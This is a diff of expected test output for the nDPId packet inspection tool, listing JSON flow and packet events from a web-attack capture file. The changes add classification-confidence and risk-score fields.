 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5343,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":3,"flow_last_seen":1499347607345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347607345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0neNAAD4GJ\/WsEAABwKgKMuZ6AFBKtMV75YMbxYAQAOV+4wAAAQEICgE7WJgD5SoN"}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347419786,"flow_last_seen":1499347486791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232681,"flow_avg_l4_payload_len":750,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347475384,"flow_last_seen":1499347480745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347419786,"flow_last_seen":1499347486791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232681,"flow_avg_l4_payload_len":750,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347475384,"flow_last_seen":1499347480745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347475384,"flow_last_seen":1499347480745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347476667,"flow_last_seen":1499347481745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347476667,"flow_last_seen":1499347481745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347476667,"flow_last_seen":1499347481745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347479172,"flow_last_seen":1499347484745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347479172,"flow_last_seen":1499347484745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347479172,"flow_last_seen":1499347484745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347480438,"flow_last_seen":1499347485746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347480438,"flow_last_seen":1499347485746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347480438,"flow_last_seen":1499347485746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347481724,"flow_last_seen":1499347486747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347481724,"flow_last_seen":1499347486747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347481724,"flow_last_seen":1499347486747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347608596,"flow_last_seen":1499347608596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347608596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1499347608596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347608596,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UBJAAD4Gdb6sEAABwKgKMuaIAFDT6AnDAAAAAKACchA\/cwAAAgQFtAQCCAoBO1nRAAAAAAEDAwc="}
@@ -2135,7 +2135,7 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1499347613718,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347613718,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VmlAAD4Gb2esEAABwKgKMua+AFCqCgi7AAAAAKACchBlIgAAAgQFtAQCCAoBO17SAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":2,"flow_last_seen":1499347613719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347613719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5r4KHPZlqgoIvKAScSAxUwAAAgQFtAQCCAoD5TBHATte0gEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":3,"flow_last_seen":1499347613719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347613719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VmpAAD4Gb26sEAABwKgKMua+AFCqCgi8Chz2ZoAQAOXQWgAAAQEICgE7XtID5TBH"}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5418,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347611162,"flow_last_seen":1499347615984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499347615984,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5418,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347611162,"flow_last_seen":1499347615984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499347615984,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347616210,"flow_last_seen":1499347616210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347616210,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1499347616210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347616210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YLdAAD4GZRmsEAABwKgKMubYAFBJnwH3AAAAAKACchDJyQAAAgQFtAQCCAoBO2FAAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":2,"flow_last_seen":1499347616211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347616211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5thWFuJlSZ8B+KAScSBbkQAAAgQFtAQCCAoD5TK2ATthQAEDAwc="}
@@ -2144,17 +2144,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5432,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1499347617491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347617491,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VDpAAD4GcZasEAABwKgKMubmAFD8gja7AAAAAKACchDg0gAAAgQFtAQCCAoBO2KBAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":2,"flow_last_seen":1499347617491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347617491,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5ubMDNHo\/II2vKAScSAL4QAAAgQFtAQCCAoD5TP2ATtigQEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":3,"flow_last_seen":1499347617492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347617492,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VDtAAD4GcZ2sEAABwKgKMubmAFD8gja8zAzR6YAQAOWq6AAAAQEICgE7YoED5TP2"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347485533,"flow_last_seen":1499347490747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347485533,"flow_last_seen":1499347490747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347485533,"flow_last_seen":1499347490747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347486787,"flow_last_seen":1499347492748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347486787,"flow_last_seen":1499347492748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347486787,"flow_last_seen":1499347492748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347489408,"flow_last_seen":1499347494749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347489408,"flow_last_seen":1499347494749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347489408,"flow_last_seen":1499347494749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347490659,"flow_last_seen":1499347495749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347490659,"flow_last_seen":1499347495749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347490659,"flow_last_seen":1499347495749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347493167,"flow_last_seen":1499347498750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
